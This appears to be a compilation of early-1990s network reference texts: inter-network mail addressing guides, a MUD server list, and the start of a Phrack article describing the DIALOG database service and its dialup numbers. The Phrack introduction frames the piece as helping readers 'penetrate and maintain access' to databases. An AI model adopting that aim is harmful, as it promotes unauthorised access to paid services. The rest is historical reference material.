tee(1): rlogin -l netfind |& tee log You can also disable trace output from the "Other" menu. You can get the Netfind software by anonymous FTP from ftp.cs.colorado.edu, in pub/cs/distribs/netfind. More complete documentation is also available in that package. A paper describing the methodology is available in pub/cs/techreports/schwartz/RD.Papers/PostScript/White.Pages.ps.Z (compressed PostScript) or pub/cs/techreports/schwartz/RD.Papers/ASCII/White.Pages.txt.Z (compressed ASCII). Please send comments/questions to schwartz@cs.colorado.edu. If you would like to be added to the netfind-users list (for software updates and other discussions, etc.), send mail to: netfind-users-request@cs.colorado.edu. Help/Search/Other/Quit [h/s/o/q]: q Exiting Netfind server... Connection closed by foreign host. _______________________________________________________________________________ Commercial Networks Reachable From The Internet ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ By Roman Kanala (kanala@sc2a.unige.ch), CUEPE, University of Geneva 1. Internet to X.400 ==================== An X.400 address in form First name : Fffff Surname : Nnnnn Organization : Ooooo ADMD : Aaaaa Country : Cc looks in RFC822 (Internet) addressing like /G=Fffff/S=Nnnnn/O=Ooooo/@Aaaa.Cc or in%"/G=Fffff/S=Nnnnn/O=Ooooo/@Aaaa.Cc" 2. Any X.400 to Internet ======================== My Internet address kanala@sc2a.unige.ch can be written for X.400 services (like arCom400 in Switzerland, Sprint MAIL or MCI Mail in the USA) as follows: C=CH; ADMD=ARCOM; PRMD=SWITCH; O=UNIGE; OU=SC2A; S=KANALA and in Internet RFC822 form (althrough I don't see any reason to do it this way for sending messages from Internet to Internet): /S=Kanala/OU=sc2a/O=UniGe/P=Switch/@arcom.ch 3. MCI Mail to Internet (via a gateway) ======================= If you are in the USA and using MCI Mail, then you can write to Internet addresses as follows: TO: Roman Kanala (EMS) EMS: INTERNET MBX: kanala@sc2a.unige.ch The gateway from MCI Mail to Internet is accessed by referencing the user's name as though he were on an EMS service. When EMS name of INTERNET is used for example, in the USA, then it's in order to have NRI (Reston VA) handle the message for him. When prompted for mailbox MBX, user enters the Internet address he is wanting to send a message to. 4. Internet to MCI Mail ======================= The general address form is username@mcimail.com, where the username is in one of two forms: either full username or the numerical box number in form of digits only and preceded by three zeros, for ex. 0001234567@mcimail.com (address 1234567 is ficticious). 5. AppleLink to Internet or Bitnet ================================== Internet address is used with a suffix @INTERNET#, like kanala@sc2a.unige.ch@internet# or kanala@cgeuge52.bitnet@internet# (here cgeuge52 is the bitnet address of sc2a.unige.ch) 6. Internet or Bitnet to AppleLink ================================== AppleLink address is used as if it were an Internet username on the AppleLink.Apple.Com node, like: CH0389@applelink.apple.com 7. CompuServe to Internet ========================= In the address field from CompuServe, type the symbol >, "greater than", the word "INTERNET" in uppercase characters, then a space followed by the Internet address, like: >INTERNET kanala@sc2a.unige.ch 8. Internet to CompuServe ========================= The CompuServe address is used followed by "@compuserve.com". In the CompuServe mailbox number the comma is replaces by a period, example: 12345.678@compuserve.com (address 12345.678 is ficticious) _______________________________________________________________________________ Inter-Network Mail Guide ~~~~~~~~~~~~~~~~~~~~~~~~ This document is Copyright 1990 by John J. Chew. All rights reserved. Permission for non-commercial distribution is hereby granted, provided that this file is distributed intact, including this copyright notice and the version information above. Permission for commercial distribution can be obtained by contacting the author as described below. INTRODUCTION This file documents methods of sending mail from one network to another. It represents the aggregate knowledge of the readers of comp.mail.misc and many contributors elsewhere. If you know of any corrections or additions to this file, please read the file format documentation below and then mail to me: John J. Chew DISTRIBUTION (news) This list is posted monthly to Usenet newsgroups comp.mail.misc and news.newusers.questions. (mail) I maintain a growing list of subscribers who receive each monthly issue by electronic mail, and recommend this to anyone planning to redistribute the list on a regular basis. (FTP) Internet users can fetch this guide by anonymous FTP as ~ftp/pub/docs/ internetwork-mail-guide on Ra.MsState.Edu (130.18.80.10 or 130.18.96.37) [Courtesy of Frank W. Peters] (Listserv) Bitnet users can fetch this guide from the Listserv at UNMVM. Send mail to LISTSERV@UNMVM with blank subject and body consisting of the line "GET NETWORK GUIDE". [Courtesy of Art St. George] HOW TO USE THIS GUIDE Each entry in this file describes how to get from one network to another. To keep this file at a reasonable size, methods that can be generated by transitivity (A->B and B->C gives A->B->C) are omitted. Entries are sorted first by source network and then by destination network. This is what a typical entry looks like: #F mynet #T yournet #R youraddress #C contact address if any #I send to "youraddress@thegateway" For parsing purposes, entries are separated by at least one blank line, and each line of an entry begins with a "#" followed by a letter. Lines beginning with "#" are comments and need not be parsed. Lines which do not start with a "#" at all should be ignored as they are probably mail or news headers. #F (from) and #T (to) lines specify source and destination networks. If you're sending me information about a new network, please give me a brief description of the network so that I can add it to the list below. The abbreviated network names used in #F and #T lines should consist only of the characters a-z, 0-9 and "-" unless someone can make a very convincing case for their favourite pi character. These are the currently known networks with abbreviated names: applelink AppleLink (Apple Computer, Inc.'s in-house network) bitnet international academic network bix Byte Information eXchange: Byte magazine's commercial BBS bmug Berkeley Macintosh Users Group compuserve commercial time-sharing service connect Connect Professional Information Network (commercial) easynet Easynet (DEC's in-house mail system) envoy Envoy-100 (Canadian commercial mail service) fax Facsimile document transmission fidonet PC-based BBS network geonet GeoNet Mailbox Systems (commercial) internet the Internet mci MCI's commercial electronic mail service mfenet Magnetic Fusion Energy Network nasamail NASA internal electronic mail peacenet non-profit mail service sinet Schlumberger Information NETwork span Space Physics Analysis Network (includes HEPnet) sprintmail Sprint's commercial mail service (formerly Telemail) thenet Texas Higher Education Network #R (recipient) gives an example of an address on the destination network, to make it clear in subsequent lines what text requires subsitution. #C (contact) gives an address for inquiries concerning the gateway, expressed as an address reachable from the source (#F) network. Presumably, if you can't get the gateway to work at all, then knowing an unreachable address on another network will not be of great help. #I (instructions) lines, of which there may be several, give verbal instructions to a user of the source network to let them send mail to a user on the destination network. Text that needs to be typed will appear in double quotes, with C-style escapes if necessary. #F applelink #T internet #R user@domain #I send to "user@domain@internet#" #I domain can be be of the form "site.bitnet", address must be <35 characters #F bitnet #T internet #R user@domain #I Methods for sending mail from Bitnet to the Internet vary depending on #I what mail software is running at the Bitnet site in question. In the #I best case, users should simply be able to send mail to "user@domain". #I If this doesn't work, try "user%domain@gateway" where "gateway" is a #I regional Bitnet-Internet gateway site. Finally, if neither of these #I works, you may have to try hand-coding an SMTP envelope for your mail. #I If you have questions concerning this rather terse note, please try #I contacting your local postmaster or system administrator first before #I you send me mail -- John Chew #F compuserve #T fax #R +1 415 555 1212 #I send to "FAX 14155551212" (only to U.S.A.) #F compuserve #T internet #R user@domain #I send to ">INTERNET:user@domain" #F compuserve #T mci #R 123-4567 #I send to ">MCIMAIL:123-4567" #F connect #T internet #R user@domain #I send to CONNECT id "DASNET" #I first line of message: "\"user@domain\"@DASNET" #F easynet #T bitnet #R user@site #C DECWRL::ADMIN #I from VMS use NMAIL to send to "nm%DECWRL::\"user@site.bitnet\"" #I from Ultrix #I send to "user@site.bitnet" or if that fails #I (via IP) send to "\"user%site.bitnet\"@decwrl.dec.com" #I (via DECNET) send to "DECWRL::\"user@site.bitnet\"" #F easynet #T fidonet #R john smith at 1:2/3.4 #C DECWRL::ADMIN #I from VMS use NMAIL to send to #I "nm%DECWRL::\"john.smith@p4.f3.n2.z1.fidonet.org\"" #I from Ultrix #I send to "john.smith@p4.f3.n2.z1.fidonet.org" or if that fails #I (via IP) send to \"john.smith%p4.f3.n2.z1.fidonet.org\"@decwrl.dec.com" #I (via DECNET) send to "DECWRL::\"john.smith@p4.f3.n2.z1.fidonet.org\"" #F easynet #T internet #R user@domain #C DECWRL::ADMIN #I from VMS use NMAIL to send to "nm%DECWRL::\"user@domain\"" #I from Ultrix #I send to "user@domain" or if that fails #I (via IP) send to "\"user%domain\"@decwrl.dec.com" #I (via DECNET) send to "DECWRL::\"user@domain\"" #F envoy #T internet #R user@domain #C ICS.TEST or ICS.BOARD #I send to "[RFC-822=\"user(a)domain\"]INTERNET/TELEMAIL/US #I for special characters, use @=(a), !=(b), _=(u), any=(three octal digits) #F fidonet #T internet #R user@domain #I send to "uucp" at nearest gateway site #I first line of message: "To: user@domain" #F geonet #T internet #R user@domain #I send to "DASNET" #I subject line: "user@domain!subject" #F internet #T applelink #R user #I send to "user@applelink.apple.com" #F internet #T bitnet #R user@site #I send to "user%site.bitnet@gateway" where "gateway" is a gateway host that #I is on both the internet and bitnet. Some examples of gateways are: #I cunyvm.cuny.edu mitvma.mit.edu. Check first to see what local policies #I are concerning inter-network forwarding. #F internet #T bix #R user #I send to "user@dcibix.das.net" #F internet #T bmug #R John Smith #I send to "John.Smith@bmug.fidonet.org" #F internet #T compuserve #R 71234,567 #I send to "71234.567@compuserve.com" #I note: Compuserve account IDs are pairs of octal numbers. Ordinary #I consumer CIS user IDs begin with a `7' as shown. #F internet #T connect #R NAME #I send to "NAME@dcjcon.das.net" #F internet #T easynet #R HOST::USER #C admin@decwrl.dec.com #I send to "user@host.enet.dec.com" or "user%host.enet@decwrl.dec.com" #F internet #T easynet #R John Smith @ABC #C admin@decwrl.dec.com #I send to "John.Smith@ABC.MTS.DEC.COM" #I (This syntax is for All-In-1 users.) #F internet #T envoy #R John Smith (ID=userid) #C /C=CA/ADMD=TELECOM.CANADA/ID=ICS.TEST/S=TEST_GROUP/@nasamail.nasa.gov #C for second method only #I send to "uunet.uu.net!att!attmail!mhs!envoy!userid" #I or to "/C=CA/ADMD=TELECOM.CANADA/DD.ID=userid/PN=John_Smith/@Sprint.COM" #F internet #T fidonet #R john smith at 1:2/3.4 #I send to "john.smith@p4.f3.n2.z1.fidonet.org" #F internet #T geonet #R user at host #I send to "user:host@map.das.net" #I American host is geo4, European host is geo1. #F internet #T mci #R John Smith (123-4567) #I send to "1234567@mcimail.com" #I or send to "JSMITH@mcimail.com" if "JSMITH" is unique #I or send to "John_Smith@mcimail.com" if "John Smith" is unique - note the #I underscore! #I or send to "John_Smith/1234567@mcimail.com" if "John Smith" is NOT unique #F internet #T mfenet #R user@mfenode #I send to "user%mfenode.mfenet@nmfecc.arpa" #F internet #T nasamail #R user #C #I send to "user@nasamail.nasa.gov" #F internet #T peacenet #R user #C #I send to "user%cdp@arisia.xerox.com" #F internet #T sinet #R node::user or node1::node::user #I send to "user@node.SINet.SLB.COM" or "user%node@node1.SINet.SLB.COM" #F internet #T span #R user@host #C #I send to "user@host.span.NASA.gov" #I or to "user%host.span@ames.arc.nasa.gov" #F internet #T sprintmail #R [userid "John Smith"/organization]system/country #I send to /C=country/ADMD=system/O=organization/PN=John_Smith/DD.ID=userid/@Sprint.COM" #F internet #T thenet #R user@host #I send to "user%host.decnet@utadnx.cc.utexas.edu" #F mci #T internet #R John Smith #I at the "To:" prompt type "John Smith (EMS)" #I at the "EMS:" prompt type "internet" #I at the "Mbx:" prompt type "user@domain" #F nasamail #T internet #R user@domain #I at the "To:" prompt type "POSTMAN" #I at the "Subject:" prompt enter the subject of your message #I at the "Text:" prompt, i.e. as the first line of your message, #I enter "To: user@domain" #F sinet #T internet #R user@domain #I send to "M_MAILNOW::M_INTERNET::\"user@domain\"" #I or "M_MAILNOW::M_INTERNET::domain::user" #F span #T internet #R user@domain #C NETMGR@NSSDCA #I send to "AMES::\"user@domain\"" #F sprintmail #T internet #R user@domain #I send to "[RFC-822=user(a)domain @GATEWAY]INTERNET/TELEMAIL/US" #F thenet #T internet #R user@domain #I send to UTADNX::WINS%" user@domain " _______________________________________________________________________________ MUDs ~~~~ By Frosty of CyberSpace Project ------------------------------------------------------------------------------ MUDWHO servers (5) Name Address Numeric Address Port Status Notes ------------------------------------------------------------------------------ Amber amber.ecst.csuchico.edu 132.241.1.43 6889 up 1 DEC decuac.dec.com 192.5.214.1 6889 up 5 Littlewood littlewood.math.okstate. 139.78.1.13 6889 up 4 edu Nova nova.tat.physik. 134.2.62.161 6889 up 3 uni-tuebingen.de PernWHO milo.mit.edu 18.70.0.216 6889 up 2 ------------------------------------------------------------------------------ AberMUDs (11) Name Address Numeric Address Port Status Notes ------------------------------------------------------------------------------ Aber5@FSU loligo.cc.fsu.edu 128.186.2.99 5000 R* DIRT ulrik.uio.no 129.240.2.4 6715 up 32 Dragon messua.informatik. 137.226.224.9 6715 up rwth-aachen.de Eddie aber eddie.ee.vt.edu 128.173.5.207 5000 TO Alles EnchantedMud neptune.calstatela.edu 130.182.193.1 6715 up 22 Longhorn lisboa.cs.utexas.edu 128.83.139.10 6715 up Mustang MUD mustang.dell.com 143.166.224.42 6715 up SpudMud stjoe.cs.uidaho.edu 129.101.128.7 6715 up Temple bigboy.cis.temple.edu 129.32.32.98 6715 up The Underground hal.gnu.ai.mit.edu 128.52.46.11 6715 R* Wolf b.cs.wvu.wvnet.edu 129.71.11.2 6715 R* ------------------------------------------------------------------------------ DikuMUDs (17) Name Address Numeric Address Port Status Notes ------------------------------------------------------------------------------ Albanian judy.indstate.edu 139.102.14.10 4000 R DikuMUD AlexMUD alex.stacken.kth.se 130.237.237.3 4000 up *Alfa Diku alfa.me.chalmers.se 129.16.50.11 4000 up Austin MUD austin.daimi.aau.dk 130.225.16.161 4000 R 29 Caltech DIKU eltanin.caltech.edu 131.215.139.53 4000 R Copper Diku copper.denver.colorado. 132.194.10.1 4000 up 33 edu Davis Diku fajita.ucdavis.edu 128.120.61.203 3000 up 28 DikuMUD I bigboy.cis.temple.edu 129.32.32.98 4000 up Elof DikuMUD elof.iit.edu 192.41.245.90 4000 up Epic hal.gnu.ai.mit.edu 128.52.46.11 9000 R Grimne Diku flipper.pvv.unit.no 129.241.36.200 4000 R HypeNet ???? 129.10.12.2 4000 TO Matsci1 Diku matsci1.uncwil.edu 128.109.221.21 4000 up Mudde hawk.svl.cdc.com 129.179.4.49 4000 up Pathetique Sejnet Diku sejnet.sunet.se 192.36.125.3 4000 up Waterdeep shine.princeton.edu 128.112.120.28 4000 up Wayne Diku venus.eng.wayne.edu 141.217.24.4 4000 R ------------------------------------------------------------------------------ DUMs (2) Name Address Numeric Address Port Status Notes ------------------------------------------------------------------------------ CanDUM II cheetah.vlsi.waterloo. 129.97.128.253 2001 up edu DUM II legolas.cs.umu.se 130.239.88.5 2001 R 23 ------------------------------------------------------------------------------ LPmuds (58) Name Address Numeric Address Port Status Notes ------------------------------------------------------------------------------ Aegolius vyonous.kennesaw.edu 130.218.13.19 2000 up Acadicus After Hours janice.cc.wwu.edu 140.160.240.28 2000 up 30 Akropolis ???? 139.124.40.4 6666 up Allinite ???? 134.126.21.223 2222 up BatMUD palikka.jyu.fi 130.234.0.3 2001 up *CyberWorld newview.etsu.edu 192.43.199.33 3000 up 34 *Darkemud dunix.drake.edu 192.84.11.2 4040 up 26 Darker Realms worf.tamu.edu 128.194.51.189 2000 up Dartmouth LPMud lusty.tamu.edu 128.194.10.118 2000 up Deeper Trouble alk.iesd.auc.dk 130.225.48.46 4242 up DevMUD huey.cc.utexas.edu 128.83.135.2 9300 R DiscWorld II peregrin.resmel.bhp.com. 134.18.1.12 2000 up au Dragon's Den ???? 129.25.7.111 2222 up End Of The Line mud.stanford.edu 36.21.0.47 2010 up 35 Finnegan's Wake maxheadroom.agps.lanl. 192.12.184.10 2112 up gov Frontier blish.cc.umanitoba.ca 130.179.168.77 9165 up GateWay secum.cs.dal.ca 129.173.24.31 6969 up *Genesis milou.cd.chalmers.se 129.16.79.12 2000 up 36 *Igor epsilon.me.chalmers.se 129.16.50.30 1701 up ImperialMUD aix.rpi.edu 128.113.26.11 2000 up 37 Ivory Tower brown-swiss.macc.wisc. 128.104.30.151 2000 R 27 edu Kobra duteca4.et.tudelft.nl 130.161.144.22 8888 up LPSwat aviator.cc.iastate.edu 129.186.140.6 2020 up Marches of chema.ucsd.edu 132.239.68.1 3000 up Antan Middle-Earth oba.dcs.gla.ac.uk 130.209.240.66 3000 up 38 Muddog Mud phaedrus.math.ufl.edu 128.227.168.2 2000 up Mystic ohm.gmu.edu 129.174.1.33 4000 up NANVAENT saddle.ccsun.strath.ac. 130.159.208.54 3000 up 24 uk Nameless complex.is 130.208.165.231 2000 up Nanny lysator.liu.se 130.236.254.1 2000 up NeXT ???? 152.13.1.5 2000 up Nemesis dszenger9.informatik. 131.159.8.67 2000 up tu-muenchen.de *Nightfall nova.tat.physik. 134.2.62.161 4242 up uni-tuebingen.de Nightmare orlith.bates.edu 134.181.1.12 2666 R Nirvana 4 elof.iit.edu 192.41.245.90 3500 up Nuage fifi.univ-lyon1.fr 134.214.100.21 2000 R *Overdrive im1.lcs.mit.edu 18.52.0.151 5195 up PaderMUD athene.uni-paderborn.de 131.234.2.32 4242 up PixieMud elof.iit.edu 192.41.245.90 6969 up QUOVADIS disun29.epfl.ch 128.178.79.77 2345 up Realmsmud hammerhead.cs.indiana. 129.79.251.8 2000 up edu Ringworld ???? 130.199.96.45 3469 R* 34 Round Table engr71.scu.edu 129.210.16.71 2222 up Sky Realms maxheadroom.agps.lanl. 192.12.184.10 2000 R* gov SmileyMud elof.iit.edu 192.41.245.90 5150 up StickMUD palikka.jyu.fi 130.234.0.3 7680 up SvenskMUD lysator.liu.se 130.236.254.1 2043 up 39 *The Mud dogstar.colorado.edu 128.138.248.32 5555 up Institute Top Mud lonestar.utsa.edu 129.115.120.1 2001 up Tsunami II gonzo.cc.wwu.edu 140.160.240.20 2777 R* 20 TubMUD morgen.cs.tu-berlin.de 130.149.19.20 7680 up Valhalla wiretap.spies.com 130.43.3.3 2444 up Valkyrie Prime fozzie.cc.wwu.edu 140.160.240.21 2777 up VikingMUD swix.ifi.unit.no 129.241.163.51 2001 up Vincent's aviator.cc.iastate.edu 129.186.140.6 1991 up 31 Hollow World of Mizar delial.docs.uu.se 130.238.8.40 9000 R ------------------------------------------------------------------------------ mage (1) Name Address Numeric Address Port Status Notes ------------------------------------------------------------------------------ SynthMAGE synth.erc.clarkson.edu 128.153.28.35 4242 TO ------------------------------------------------------------------------------ MOOs (1) Name Address Numeric Address Port Status Notes ------------------------------------------------------------------------------ Lambda MOO lambda.parc.xerox.com 13.2.116.36 8888 up ------------------------------------------------------------------------------ TinyMUCKs (12) Name Address Numeric Address Port Status Notes ------------------------------------------------------------------------------ AfterFive pa.itd.com 128.160.2.249 9999 up 31 Burning Metal amber.ecst.csuchico.edu 132.241.1.43 8088 up Crossroads coyote.cs.wmich.edu 141.218.40.40 5823 R* FurryMUCK highlandpark.rest.ri.cmu 128.2.254.5 2323 up 8 edu High Seas opus.calstatela.edu 130.182.111.1 4301 up Lawries MUD cserve.cs.adfa.oz.au 131.236.20.1 4201 R 7 PythonMUCK zeus.calpoly.edu 129.65.16.21 4201 up 18 QWest glia.biostr.washington. 128.95.10.115 9999 up edu Quartz Paradise quartz.rutgers.edu 128.6.60.6 9999 up 40 Time Traveller betz.biostr.washington. 128.95.10.119 4096 up edu TinyMUD Classic winner.itd.com 128.160.2.248 2000 R 41 II Visions l_cae05.icaen.uiowa.edu 128.255.21.25 2001 R 16 ------------------------------------------------------------------------------ MUGs (1) Name Address Numeric Address Port Status Notes ------------------------------------------------------------------------------ UglyMUG ???? 130.88.14.17 4201 up ------------------------------------------------------------------------------ TinyMUSEs (5) Name Address Numeric Address Port Status Notes ------------------------------------------------------------------------------ Fantasia betz.biostr.washington. 128.95.10.119 4201 up 13 edu FantasyMuse case2.cs.usu.edu 129.123.7.19 1701 up 42 MicroMUSE chezmoto.ai.mit.edu 18.43.0.102 4201 up 6 Rhostshyl stealth.cit.cornell.edu 128.253.180.15 4201 up 42 TrekMUSE ecsgate.uncecs.edu 128.109.201.1 1701 R 42 ------------------------------------------------------------------------------ TinyMUSHes (15) Name Address Numeric Address Port Status Notes ------------------------------------------------------------------------------ Dungeon ra.info.sunyit.edu 149.15.1.3 8888 up Global MUSH workstation5.colby.edu 137.146.64.237 4201 up ImageCastle wizard.etsu.edu 192.43.199.19 4201 up Narnia nimitz.mit.edu 18.80.0.161 2555 R* PernMUSH milo.mit.edu 18.70.0.216 4201 up 42 SouthCon utpapa.ph.utexas.edu 128.83.131.52 4201 up 42 Spellbound thumper.cc.utexas.edu 128.83.135.23 4201 up SqueaMUSH ultimo.socs.uts.edu.au 138.25.8.7 6699 R** StingMUSH newview.etsu.edu 192.43.199.33 1701 up 42 TinyCWRU caisr2.caisr.cwru.edu 129.22.24.22 4201 R* TinyHORNS louie.cc.utexas.edu 128.83.135.4 4201 up TinyTIM II cheetah.ece.clarkson. 128.153.13.54 5440 up edu VisionMUSH tramp.cc.utexas.edu 128.83.135.26 4567 TO ------------------------------------------------------------------------------ TeenyMUDs (3) Name Address Numeric Address Port Status Notes ------------------------------------------------------------------------------ ApexMUD apex.yorku.ca 130.63.7.6 4201 up Evil!MUD fido.econ.arizona.edu 128.196.196.1 4201 up MetroMUT uokmax.ecn.uoknor.edu 129.15.20.2 5000 R ------------------------------------------------------------------------------ TinyMUDs (2) Name Address Numeric Address Port Status Notes ------------------------------------------------------------------------------ DragonMUD ghost.cse.nau.edu 134.114.64.6 4201 up 14 TinyWORLD rillonia.ssc.gov 143.202.16.13 6250 up ------------------------------------------------------------------------------ UnterMUDs (9) Name Address Numeric Address Port Status Notes ------------------------------------------------------------------------------ ChrisMUD hawkwind.utcs.utoronto. 128.100.102.51 6600 up 10 ca DECmud decuac.dec.com 192.5.214.1 6565 up 15 DreamScape moebius.math.okstate. 139.78.10.3 6250 up 11 edu Islandia hawkwind.utcs.utoronto. 128.100.102.51 2323 up ca RealWorld cook.brunel.ac.uk 134.83.128.246 4201 up 17 Sludge unix1.cc.ysu.edu 192.55.234.50 6565 up 19 Sunmark moebius.math.okstate. 139.78.10.3 6543 up edu WanderLand sun.ca 192.75.19.1 6666 up 9 WireHED amber.ecst.csuchico.edu 132.241.1.43 6565 up 12 ------------------------------------------------------------------------------ YAMUDs (1) Name Address Numeric Address Port Status Notes ------------------------------------------------------------------------------ GooLand toby.cis.uoguelph.ca 131.104.48.112 6715 up ------------------------------------------------------------------------------ Notes ------------------------------------------------------------------------------ Asterisk (*) before the name indicates that this sites entry was modified in the last 7 days. Status field: * = last successful connection was more than 7 days ago ** = last successful connection was more than 30 days ago # = no successful connection on record R = connection refused TO = connection timed out HD = host down or unreachable ND = network down or unreachable NA = insufficient address information available 1. administrator is warlock@ecst.csuchico.edu 2. administrator is jt1o@andrew.cmu.edu 3. administrator is gamesmgr@taurus.tat.physik.uni-tuebingen.de 4. administrator is jds@math.okstate.edu 5. administrator is mjr@decuac.dec.com 6. send mail to micromuse-registration@michael.ai.mit.edu to register 7. send mail to Lawrie.Brown@adfa.oz.au to register 8. send mail to ss7m@andrew.cmu.edu to register 9. send mail to wanderland@lilith.ebay.sun.com to register 10. send mail to cks@hawkwind.utcs.toronto.edu to register 11. send mail to jds@math.okstate.edu to register 12. send mail to warlock@ecst.csuchico.edu to register 13. send mail to fantasia@betz.biostr.washington.edu to register 14. send mail to {jjt,jopsy}@naucse.cse.nau.edu to register 15. send mail to mjr@decuac.dec.com to register 16. send mail to schlake@minos.nmt.edu to register 17. send mail to ee89psw@brunel.ac.uk to register 18. send mail to {awozniak,claudius}@zeus.calpoly.edu to register 19. send mail to mud@cc.ysu.edu to register 20. hours are 0000-1600(M) 0100-1700(TWRF) 0100-2400(S) 0000-2400(U) GMT 21. hours are 1700-0800(MTWRF) 0000-2400(SU) CST 22. hours are 1900-0600(MTWRF) 0000-2400(SU) PDT 23. hours are 1900-0700(MTWRF) 0000-2400(SU) 24. hours are 1700-0900(MTWRF) 0000-2400(SU) GMT 25. hours are 1700-0700(MTWRF) 0000-2400(SU) PST 26. hours are 2100-0900(MTWRF) 0000-2400(SU) 27. hours are 1630-0800(MTWRF) 0000-2400(SU) CST 28. hours are 2000-0800(MTWRF) 0000-2400(S) 0000-1200,1700-2400(U) PST 29. hours are 1800-0800(MTWRF) 0000-2400(SU) CET 30. hours are 1700-0700(MTWRF) 0000-2400(SU) PST 31. hours are 1700-0800(MTWRF) 0000-2400(SU) CST 32. hours are 2000-0800(MTWRF) 0000-2400(SU) CET 33. hours are 1700-0800(MTWRF) 0000-2400(SU) MST 34. down until further notice 35. closed for repairs 36. the original LP; closed to public 37. closed to public 38. closed to players 39. Swedish-language mud 40. no pennies 41. mail agri@pa.itd.com to recover old characters 42. restricted theme _______________________________________________________________________________ ==Phrack Inc.== Volume Four, Issue Thirty-Nine, File 5 of 13 *************************************************************************** * * * The Complete Guide To * * The DIALOG Information Network * * * * by * * Brian Oblivion * * * * Courtesy of: Restricted-Data-Transmissions (RDT) * * "Truth Is Cheap, But Information Costs." * * * * 5/9/92 * *************************************************************************** INTRODUCTION: With the plethora of on-line databases in the public and private sectors, I feel it is becoming increasingly important to penetrate and maintain access to these databases. The databases in question contain data pertaining to our personal lives and to our environment, not to mention the tetrabytes of useful information that can be directed toward research and personal education. Who or What is DIALOG? The DIALOG Information Network is a service that links various public and commercial databases together for convenience. In the past, when one wanted to access LEGAL RESOURCE INDEX, for instance, one would have to dial direct. With DIALOG, hundreds of databases are connected via X.25 networks (Tymnet, Sprintnet, Uninet, Dialnet) eliminating frustrating searching and outrageous long distance telephone bills (before the AT&T divestiture). Further, within this file is a PARTIAL list of databases found on-line. Some of the databases are nothing more than periodicals and abstract sources, while others provide FullText articles and books. There are over 2500 periodicals, newspapers, newsletters and newswires on-line in FullText. Here are a few of my favorites: McGraw-Hill Publications On-Line (File624) - Services offer FullText of their Newsletters serving the world-wide aerospace and defense industry. Complete text from 30 newsletters such as AeroSpace Daily, BYTE, Aviation Week and Space Technology, Data Communications, ENR, among others. For more info on the database, when in DIALOG type Help News624. PR NEWSWIRE (File613) - PR Newswire records contain the complete text of news releases prepared by: companies; public relations agencies; trade associations; city, state, federal and non-US Government agencies; and other sources covering the entire spectrum of news. The complete text of a news release typically contains details or background information that is not published in newspapers. More than 8500 companies contribute news for PR Newswire. PR NEWSWIRE is a known agent of Corporate Intelligence. DMS/FI MARKET INTELLIGENCE REPORTS (File589) - FullText of World AeroSpace Weekly, covers all aspects of both civil and military aerospace activities worldwide. - World Weapons Review, very high degree of technical detail and perspective. As such, it has special appeal to military professionals and users of weapons. Note: The database treats the newsletters as separate Binders. For example, to access the World Weapons Review, after connecting to the database, type: SELECT BN=WORLD WEAPONS REVIEW or whichever newsletter you wish to search. FINE CHEMICALS DATABASE (File360) - The focus of this database is on sources for laboratory, specialty, and unusual chemicals used in scientific research and new product development. Fine chemicals are relatively pure chemicals typically produced in small quantities. The database will provide you with manufacturers and/or distributors. DUN'S ELECTRONIC YELLOW PAGES (File515) - Largest database of U.S. businesses available on DIALOG, providing information on a total of 8.5 million establishments. Corporate intelligence: you can quickly verify the existence of a business. Then you can obtain address, telephone number, employee size, Standard Industrial Classification (SIC) and other basic information. CURRENT CONTENTS SEARCH (File440) - FullText articles from over 8000+ worldwide journals dealing with science and technology. BOOKS IN PRINT (File470) - Access to in-print and out-of-print books since 1979, BIP lets you retrieve bibliographic data on virtually every book published or distributed in the United States. Plus FullText reviews on the book(s) you have selected. See next. PUBLISHERS DISTRIBUTORS AND WHOLESALERS ON-LINE (File450) - PDW on-line will locate virtually any book, audio cassette, software publisher, distributor, or wholesaler in the U.S. You now should have an idea of the power and scope of the Dialog Information Network. NOTE: Most of DIALOG's Services are now available to certain Research facilities, public and private, on CD-ROM. Check your local public and university libraries for this service. Of course, MANY of the more interesting databases are not available on CD-ROM and must still be accessed through the DIALOG network. Access to DIALOG Services The following on-line services are available from DIALOG Information Services: DIALOG DIALOG Business (DBC) DIALOG Medical Connection (DMC) DIALMAIL KNOWLEDGE INDEX The logon procedures for the first four are identical and use the same service address; procedures for KNOWLEDGE INDEX differ only in the use of the KI service address, as illustrated throughout this file. The most common method of access to DIALOG services uses local phone numbers for three telecommunication networks: DIALOG's DIALNET, BT Tymnet, TYMNET, and SprintNet. For those who live in an area that lacks a local dialup for those three networks, you may use the 800 link into the DIALNET for access to all DIALOG services except KNOWLEDGE INDEX. This access is not free, but it may cost less than dialing long-distance to reach a network node if you live in a region without local access. Access is also available through gateways from other on-line systems. Access to many DIALOG services is available from countries throughout the world and may be accessed from their own Public Data Networks. Dialnet 800-Number Access The two DIALNET 800 numbers are available for connecting to Dialog services from anywhere in the 48 contiguous states. Access through these numbers is not free. (800)DIALNET 300, 1200, and 2400 b. (w/MNP error checking) (800)342-5638 (800)847-1620 VADIC 3400 series modems (1200 baud) BELL 103 modems (300 baud) BELL 212 modems (1200 baud) Note: I have excluded all the dialup numbers for Tymnet and Sprintnet. If you don't know how to find those, obtain a file on X.25 nets and I'm sure they will be listed somewhere in them. DIALNET U.S. DIALUP NUMBERS (All DIALNET dialup numbers support 300, 1200, and 2400 baud) ARIZONA Phoenix....................................(602)257-8895 CALIFORNIA Alhambra...................................(818)300-9000 Longbeach..................................(213)491-0803 Los Angeles................................(818)300-9000 Marina Del Rey.............................(213)305-9833 Newport Beach..............................(714)756-1969 Oakland....................................(415)633-7900 Palo Alto..................................(415)858-2461 Palo Alto..................................(415)858-2461 Palo Alto....................................(415)858-2575 Sacramento.................................(916)444-5030 San Diego..................................(619)297-8610 San Francisco..............................(415)957-5910 San Jose...................................(408)432-0590 COLORADO Denver.....................................(303)860-9800 CONNECTICUT Bloomfield/Hartford........................(203)242-5954 Stamford...................................(203)324-1201 DELAWARE Wilmington.................................(302)652-1706 DISTRICT OF COLUMBIA Washington.................................(703)359-2500 GEORGIA Atlanta....................................(404)455-4221 ILLINOIS Chicago....................................(312)341-1444 INDIANA Indianapolis...............................(317)635-7259 MARYLAND Baltimore..................................(301)234-0940 MASSACHUSETTS Boston.....................................(617)439-7920 Lexington..................................(617)862-6240 MICHIGAN Ann Arbor..................................(313)973-2622 Detroit....................................(313)964-1309 MINNESOTA Minneapolis................................(612)338-0676 MISSOURI St. Louis..................................(314)731-0122 NEW JERSEY Lyndhurst..................................(201)460-8868 Morristown.................................(201)292-9646 Newark.....................................(201)824-1412 Piscataway.................................(201)562-9680 Princeton..................................(609)243-9550 